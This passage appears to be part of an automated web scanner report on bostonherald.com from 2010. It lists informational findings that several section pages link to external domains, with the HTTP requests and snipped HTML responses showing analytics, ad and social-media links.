<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2Fview.bg%3Farticleid%3D1294575%26srvc%3Drss&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

8.6. http://bostonherald.com/business/healthcare/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/healthcare/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/healthcare/?srvc=home&position=5 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:15:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Healthcare - Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/healthcare/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fhealthcare%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/business/healthcare/view/20101107regulation_hurts_medical_supplier/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/20ad74_SBiz_11072010.jpg" alt="HANGING IN THERE: Bill Fredericks, owner of AllCare Medical Supply in Millbury, is one of many home medical equipment supply businesses that is finding it tougher to survive because of government and insurance company regulations."></a>
...[SNIP]...
<a href="/business/healthcare/view/20101107maine_pine_needles_yield_valuable_tamiflu_material/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/275791_tamiflu.jpg" alt="In this Sept. 30, 2010 photo, doctors Ray Fort Jr., right, and Barbara Cole, center, with grad student Nilmini Gedivinne, left, pose in Orono, Maine."></a>
...[SNIP]...
<a href="/business/healthcare/view/20101030massachusetts_high_court_oks_caritas_christi_sale_895m_deal_could_close_within_month/"><img src="http://multimedia.heraldinteractive.com/images/20101029/stp/eca969_Hosp_10222010.jpg" alt="NONPROFIT TO FOR-PROFIT: A judge has given final approval to Caritas - a Boston-based chain of six-hospitals, including St. Elizabeth&rsquo;s Medical Center in Brighton, above - to sell itself to Cerberus Capital Management for &#36;895 million."></a>
...[SNIP]...
<a href="/business/healthcare/view/20101027glaxo_cops_to_bad_medicine_pays_750m_pleads_guilty_to_selling_faulty_paxil/"><img src="http://multimedia.heraldinteractive.com/images/20101026/stp/428063_bizz_10272010.jpg" alt="CASE CLOSED: Whistleblower Cheryl Ekard, right, and her lawyer Leslie Ann Skillen, listen to the announcement of GlaxoSmithKline&rsquo;s &#36;750 million settlement."></a>
...[SNIP]...
<a href="/entertainment/lifestyle/view/20100604medical_tip_brought_to_you_by_partners_healthcare_and_the_boston_herald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/medical_tip/PartnersHealthTip300x250_1.jpg" style="border: 1px #333 solid;" /></a>
...[SNIP]...
<!--//include 8 //-->


<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

8.7. http://bostonherald.com/entertainment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /entertainment/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /entertainment/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:34:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="Entertainment - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2F%3Fsrvc%3Drss&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/entertainment/television/general/view.bg?articleid=1294712&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Hot Coco"></a>
...[SNIP]...
<a href="http://bostonherald.com/entertainment/movies/general/view.bg?articleid=1294717&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg" alt="James Franco in &lsquo;127 Hours.&rsquo;"></a>
...[SNIP]...
<a href="http://bostonherald.com/entertainment/television/general/view.bg?articleid=1294716&srvc=edge&position=2"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/8c3eda_ltptamb20101108.jpg" alt="Hugh Laurie and Amber Tamblyn in &lsquo;House.&rsquo;"></a>
...[SNIP]...
<a href="http://bostonherald.com/entertainment/lifestyle/view.bg?articleid=1294721&srvc=edge&position=3"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/5ded1d_ltpgame20101108.jpg" alt="&#x201C;GUITAR HERO: WARRIORS OF ROCK&#x201D;"></a>
...[SNIP]...
<a href="http://bostonherald.com/entertainment/music/reviews/view.bg?articleid=1294714&srvc=edge&position=4"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/91dbf1_ltpdisc20101108.jpg" alt="&#x201C;The Lady Killer&#x201D; (Elektra)"></a>
...[SNIP]...
<a href="/users/register/?pre_select=90">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/spread_the_love_177x57.gif" alt="Spread the Love" />
</a>
...[SNIP]...
<a href="/entertainment/television/general/view/20101107watch_this">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/watch_this_177x57.gif" alt="Watch_this" />
</a>
...[SNIP]...
<a href="/entertainment/arts_culture/view/20101105gotta_love_it">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/gotta_love_it_177x57.gif" alt="Gotta_love_it" />
</a>
...[SNIP]...
<a href="/entertainment/movies/dvd/view/20101107grown_ups/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/5187df_ltpdvd20101107.jpg" alt="OPPOSITES ATTRACT: Salma Hayek plays Adam Sandler&#x2019;s high-maintenance wife in &#x2018;Grown Ups.&#x2019;" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/movies/dvd/view/20101107grown_ups/format=comments&srvc=edge&position=also">
...[SNIP]...
<a href="/entertainment/music/reviews/view/20101108tom_petty_and_the_heartbreakers/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/ccc5cd_ltptomp20101108.jpg" alt="&#x201C;Damn the Torpedoes - Deluxe Edition&#x201D; (Geffen)" /></a>
...[SNIP]...
<a href="/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/4dacb6_7209c7_ltpeven20100920.jpg" alt="From left: Blair Underwood, Lisa Vidal and Sayeed Shahidi in &#x2018;The Event.&#x2019;" /></a>
...[SNIP]...
<a href="/entertainment/arts_culture/view/20101107romantic_dramatic_tosca_is_a_winner/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/3ec29e_07tosc1.jpg" alt="SELF-PRESERVATION: Tosca (soprano Jill Gardner) faces off with Baron Scarpia (Bradley Garvin)." /></a>
...[SNIP]...
<a href="/entertainment/fashion/view/20101107dressing_the_turkeys_these_getups_are_for_the_birds/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/bb7782_ltpmodel20101107.jpg" alt="A model wears the latest wedding fashion from the Tsai Meiyue Wedding Dress collection during China Fashion Week held in Beijing, China, Friday, Oct. 29, 2010." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/fashion/view/20101107dressing_the_turkeys_these_getups_are_for_the_birds/format=comments&srvc=edge&position=also">
...[SNIP]...
<a href="/entertainment/food_dining/reviews/view/20101105join_the_club/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/efd7c5_ltpback20101105.jpg" alt="LLYONS&#x2019; SHARE: Back Bay Social Club joins restaurateur Patrick Lyons&#x2019; Towne Stove and Spirits, both on Boylston Street." /></a>
...[SNIP]...
<a href="/entertainment/books/view/20101102simple_minded_amy_sedaris_crafts_book_will_leave_readers_in_stitches/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101102/stp/7fc56b_02seda1.jpg" alt="Shore-fire fun: Amy Sedaris&rsquo; latest book, &lsquo;Simple Times: Crafts for Poor People,&rsquo; mixes crafts, kitsch and drug references." /></a>
...[SNIP]...
<div id="rssBoxWhat">
                           <a target="_new" href="http://www.twitter.com">What is Twitter?</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment" target="_new">All Entertainment</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/arts_culture/" target="_new">Arts & Culture</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/" target="_new">Movie Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/movies/" target="_new">Movie News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/music/" target="_new">Music News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/music/reviews/" target="_new">Disc Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/food_dining/" target="_new">Dining News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/health/" target="_new">Health & Fitness</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/travel/" target="_new">Travel</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/lifestyle/" target="_new">Lifestyle</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/fashion/" target="_new">Fashion</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/television/" target="_new">Television News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/books/" target="_new">Books</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_300x100.jpg" style="border: 1px #333 solid;" /></a>
...[SNIP]...
<div id="tonightTop">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/tonight.gif">
</div>
...[SNIP]...
<a class="LinksRed2None" href="/blogs/entertainment/the_assistant/?srvc=edge&position=recent">
<img style="float:left; border:0;margin:0px 3px 0 0;padding:0;width:155px;height:50px;" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg" border=0 />
</a>
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg" alt="Let's Get Viral: Your Monday Survival Guide" />
           Let's Get Viral: Your Monday Survival Guide
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/guestlisted.jpg" alt="Illegal downloader Jammie Thomas-Rasset hit with $1.5 million fine" />
           Illegal downloader Jammie Thomas-Rasset hit with $1.5 million fine
           </a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1294662"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/bba51e_ipad.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.8. http://bostonherald.com/entertainment/arts_culture/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /entertainment/arts_culture/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /entertainment/arts_culture/view.bg?articleid=1294372&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:38:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Saturday, November 6, 2010" />

   <link rel="alternate" title="Arts &amp; Culture - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/arts_culture/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Farts_culture%2Fview.bg%3Farticleid%3D1294372&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1294372&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1294372&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1294372&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(0) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

